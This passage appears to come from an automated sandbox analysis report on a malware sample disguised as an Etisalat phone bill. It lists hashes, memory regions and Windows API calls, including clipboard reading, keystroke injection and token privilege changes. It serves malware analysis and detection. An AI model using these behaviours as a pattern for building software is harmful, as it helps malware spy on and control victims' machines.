                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 8e5742d8604840a39b4b52d433faf62baee0d16ba583a21fff711293b0587678
                                      • Instruction ID: 18cc39094f9612f72f8124acf06e91094996114dfdc037411dcae14d7ffb0913
                                      • Opcode Fuzzy Hash: 8e5742d8604840a39b4b52d433faf62baee0d16ba583a21fff711293b0587678
                                      • Instruction Fuzzy Hash: 6B018FB9600942AFC315EB69C851D2AFBE9FF8A3507148199F819C7712DB34EC21CBE0
                                      APIs
                                      • __lock_file.LIBCMT ref: 00B84AD6
                                        • Part of subcall function 00B88D68: __getptd_noexit.LIBCMT ref: 00B88D68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2597487223-0
                                      • Opcode ID: d2e6884dd070077a1dcbe0a4ac2c97f5e1a15f818f1a47eb8fb30589a283b032
                                      • Instruction ID: a5a645643c636af10c71b22916c7a586de7d57cbcf484fd5366ff1974f462e5f
                                      • Opcode Fuzzy Hash: d2e6884dd070077a1dcbe0a4ac2c97f5e1a15f818f1a47eb8fb30589a283b032
                                      • Instruction Fuzzy Hash: 09F0C23194020AABDF61BF74CC063DF76E1AF00325F448598F424AA1F1DB788A50DF51
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00C262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B64FDE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: e6cbe87c53067f66b2f3cf216d5e0637b791a0e09524159337c3692d5e29944a
                                      • Instruction ID: 2ece863b72228b07c7bd8d2d317f5f2a630a35edd1fbcf12823d39810deb3c0b
                                      • Opcode Fuzzy Hash: e6cbe87c53067f66b2f3cf216d5e0637b791a0e09524159337c3692d5e29944a
                                      • Instruction Fuzzy Hash: CDF01571105B52CFCB349F64E494822BBE1EF143293208ABEE1DA82620C775A840DF40
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B809F4
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LongNamePath_memmove
                                      • String ID:
                                      • API String ID: 2514874351-0
                                      • Opcode ID: e0f8e5244de58b87792ddf9071efd643aeadd9c9e7c30178a4d5e8d5fe98a8ce
                                      • Instruction ID: 73d61c5da2991b248fe2f5b0532f0803f54c84f049e6db2e8fbb81c9d72cd8fe
                                      • Opcode Fuzzy Hash: e0f8e5244de58b87792ddf9071efd643aeadd9c9e7c30178a4d5e8d5fe98a8ce
                                      • Instruction Fuzzy Hash: DFE0CD7694422957C720D65C9C05FFA77EDDF88790F0401F5FD0CD7205DD649C818690
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction ID: 0d1ff865a50bd9447b498b3aca4615f190d70a8c7a9731e402aef5d84fe40a3a
                                      • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                      • Instruction Fuzzy Hash: 52E092B0104B005FEB348A24D815BE373E0FB06315F04085DF29A93341EB627841C759
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B9E16B,?,?,00000000), ref: 00B65DBF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 7a2eb84133cdc0ee860c1fc0ec5a6712919461b0c364a8c50a725e61674145a7
                                      • Instruction ID: fcf7c16829342997747424d64ebba5f65227aa25eaa6fe3a2b532aa73c5f4419
                                      • Opcode Fuzzy Hash: 7a2eb84133cdc0ee860c1fc0ec5a6712919461b0c364a8c50a725e61674145a7
                                      • Instruction Fuzzy Hash: 34D0C77464020CBFE710DB80DC46FA9777CD745711F100194FD0467290D6B27E508795
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __wfsopen
                                      • String ID:
                                      • API String ID: 197181222-0
                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction ID: 676a8026aeab2d1dc5708039eef9c05f9a619a5b50ac4df967779821ce469627
                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                      • Instruction Fuzzy Hash: 1BB0927684020C77DF122E82EC02A593B599B40678F848060FB0C18272A673A6A09689
                                      APIs
                                      • GetLastError.KERNEL32(00000002,00000000), ref: 00BCD46A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorLast
                                      • String ID:
                                      • API String ID: 1452528299-0
                                      • Opcode ID: c5547daba5753be94248aa351f3310de90493a56abc767da7f8a8d669f0c9049
                                      • Instruction ID: 7d638e74e57fd01076f3f3deb4323e82b557540c6d12ad1b6886c1853d00d851
                                      • Opcode Fuzzy Hash: c5547daba5753be94248aa351f3310de90493a56abc767da7f8a8d669f0c9049
                                      • Instruction Fuzzy Hash: 95712B342087028FC714EF64C491F6AB7E5EF98314F0449ADF9969B2A2DB34ED49CB52
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: a138df2196c5f94bc6d207b64e00c901af169ca25d5e363b2fd226ac700e46ec
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 4B31C170A10106DFC7A8EE58C48096AF7E6FF59381B648AE5E409CB661D731EDC5CB80
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 015E2311
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 4bab0476ee891a5ace27e095468c2043b10f2def949ae145667f434bf02f8626
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 4BE0BF7594010D9FDB00EFB4D54969E7BB4EF04301F100561FD0192281D63099508A62
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BECE50
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BECE91
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00BECED6
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BECF00
                                      • SendMessageW.USER32 ref: 00BECF29
                                      • _wcsncpy.LIBCMT ref: 00BECFA1
                                      • GetKeyState.USER32(00000011), ref: 00BECFC2
                                      • GetKeyState.USER32(00000009), ref: 00BECFCF
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BECFE5
                                      • GetKeyState.USER32(00000010), ref: 00BECFEF
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BED018
                                      • SendMessageW.USER32 ref: 00BED03F
                                      • SendMessageW.USER32(?,00001030,?,00BEB602), ref: 00BED145
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00BED15B
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BED16E
                                      • SetCapture.USER32(?), ref: 00BED177
                                      • ClientToScreen.USER32(?,?), ref: 00BED1DC
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BED1E9
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BED203
                                      • ReleaseCapture.USER32 ref: 00BED20E
                                      • GetCursorPos.USER32(?), ref: 00BED248
                                      • ScreenToClient.USER32(?,?), ref: 00BED255
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BED2B1
                                      • SendMessageW.USER32 ref: 00BED2DF
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BED31C
                                      • SendMessageW.USER32 ref: 00BED34B
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BED36C
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BED37B
                                      • GetCursorPos.USER32(?), ref: 00BED39B
                                      • ScreenToClient.USER32(?,?), ref: 00BED3A8
                                      • GetParent.USER32(?), ref: 00BED3C8
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BED431
                                      • SendMessageW.USER32 ref: 00BED462
                                      • ClientToScreen.USER32(?,?), ref: 00BED4C0
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BED4F0
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BED51A
                                      • SendMessageW.USER32 ref: 00BED53D
                                      • ClientToScreen.USER32(?,?), ref: 00BED58F
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BED5C3
                                        • Part of subcall function 00B625DB: GetWindowLongW.USER32(?,000000EB), ref: 00B625EC
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BED65F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                      • String ID: @GUI_DRAGID$F
                                      • API String ID: 3977979337-4164748364
                                      • Opcode ID: 84b039a1bec7187f1725c013bd2660f8cfca9ba25348e54bbb960869c245debe
                                      • Instruction ID: 8e02ae319c73f1359dd0d1dc7cfe04d5750762b2bf4e76a26d7ac40952aef51c
                                      • Opcode Fuzzy Hash: 84b039a1bec7187f1725c013bd2660f8cfca9ba25348e54bbb960869c245debe
                                      • Instruction Fuzzy Hash: D742AE70204281AFDB25CF29C884FAABFE5FF48314F1405ADF695872A1CB71E955CB92
                                      APIs
                                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BE873F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 3850602802-328681919
                                      • Opcode ID: 0ecffe4ae73bcfd98773c593f77d94e41c1f473a7c30f2d96b420b00fea6ae8e
                                      • Instruction ID: cfeeb658f613686862038004a51b75e6eb982a515c524875fa6e6d1ec25ab8cc
                                      • Opcode Fuzzy Hash: 0ecffe4ae73bcfd98773c593f77d94e41c1f473a7c30f2d96b420b00fea6ae8e
                                      • Instruction Fuzzy Hash: DD12C071500685AFEB259F65CC89FAA7BF8EF49710F2041A9F919EB2E1DF708941CB10
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$_memset
                                      • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                      • API String ID: 1357608183-1798697756
                                      • Opcode ID: 2cee2469f4270c8f036cb17ea6f066c6bd91468efb0329b63956f1a3a585e23f
                                      • Instruction ID: 4eab8ff1c0f5da93c14d6953d9f4c0844dce8174e5008462bb515c2f67c3e471
                                      • Opcode Fuzzy Hash: 2cee2469f4270c8f036cb17ea6f066c6bd91468efb0329b63956f1a3a585e23f
                                      • Instruction Fuzzy Hash: 60939171A402159FDB24CF58C891BFDB7F1FF48710F2585AAE959AB281E7B09E81CB40
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,?), ref: 00B64A3D
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B9DA8E
                                      • IsIconic.USER32(?), ref: 00B9DA97
                                      • ShowWindow.USER32(?,00000009), ref: 00B9DAA4
                                      • SetForegroundWindow.USER32(?), ref: 00B9DAAE
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B9DAC4
                                      • GetCurrentThreadId.KERNEL32 ref: 00B9DACB
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B9DAD7
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9DAE8
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B9DAF0
                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B9DAF8
                                      • SetForegroundWindow.USER32(?), ref: 00B9DAFB
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB10
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB1B
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB25
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB2A
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB33
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB38
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B9DB42
                                      • keybd_event.USER32(00000012,00000000), ref: 00B9DB47
                                      • SetForegroundWindow.USER32(?), ref: 00B9DB4A
                                      • AttachThreadInput.USER32(?,?,00000000), ref: 00B9DB71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: bc8289bb7b3e582c9aa69602357e8886276a7f3d7ee8da2f84adc169b9c00d0d
                                      • Instruction ID: 0caccc3078182ebf4fec0554df0de036cbd788a11e83403adee3d365c12470d4
                                      • Opcode Fuzzy Hash: bc8289bb7b3e582c9aa69602357e8886276a7f3d7ee8da2f84adc169b9c00d0d
                                      • Instruction Fuzzy Hash: 59316471A40358BFEF205FA29C89F7F3EACEB54B50F114075FA04AB1D1CA715D10AAA0
                                      APIs
                                        • Part of subcall function 00BB8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                        • Part of subcall function 00BB8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                        • Part of subcall function 00BB8CC3: GetLastError.KERNEL32 ref: 00BB8D47
                                      • _memset.LIBCMT ref: 00BB889B
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BB88ED
                                      • CloseHandle.KERNEL32(?), ref: 00BB88FE
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BB8915
                                      • GetProcessWindowStation.USER32 ref: 00BB892E
                                      • SetProcessWindowStation.USER32(00000000), ref: 00BB8938
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BB8952
                                        • Part of subcall function 00BB8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BB8851), ref: 00BB8728
                                        • Part of subcall function 00BB8713: CloseHandle.KERNEL32(?,?,00BB8851), ref: 00BB873A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                      • String ID: $default$winsta0
                                      • API String ID: 2063423040-1027155976
                                      • Opcode ID: 8e544e80880242e573171cd77ec323aa3890cf038fd310b718952b5a26331a23
                                      • Instruction ID: 0720e2fb4574d5ab20ca9510dc99a313f1e6a18b0f6ec2c61284f137002129a5
                                      • Opcode Fuzzy Hash: 8e544e80880242e573171cd77ec323aa3890cf038fd310b718952b5a26331a23
                                      • Instruction Fuzzy Hash: 07810571901249AFDF119FA4DC85AFEBBBDEF04304F1841AAF910A6161DFB18E15DB60
                                      APIs
                                      • OpenClipboard.USER32(00BEF910), ref: 00BD4284
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BD4292
                                      • GetClipboardData.USER32(0000000D), ref: 00BD429A
                                      • CloseClipboard.USER32 ref: 00BD42A6
                                      • GlobalLock.KERNEL32(00000000), ref: 00BD42C2
                                      • CloseClipboard.USER32 ref: 00BD42CC
                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00BD42E1
                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00BD42EE
                                      • GetClipboardData.USER32(00000001), ref: 00BD42F6
                                      • GlobalLock.KERNEL32(00000000), ref: 00BD4303
                                      • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00BD4337
                                      • CloseClipboard.USER32 ref: 00BD4447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                      • String ID:
                                      • API String ID: 3222323430-0
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BCC9F8
                                      • FindClose.KERNEL32(00000000), ref: 00BCCA4C
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCCA71
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BCCA88
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BCCAAF
                                      • __swprintf.LIBCMT ref: 00BCCAFB
                                      • __swprintf.LIBCMT ref: 00BCCB3E
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • __swprintf.LIBCMT ref: 00BCCB92
                                        • Part of subcall function 00B838D8: __woutput_l.LIBCMT ref: 00B83931
                                      • __swprintf.LIBCMT ref: 00BCCBE0
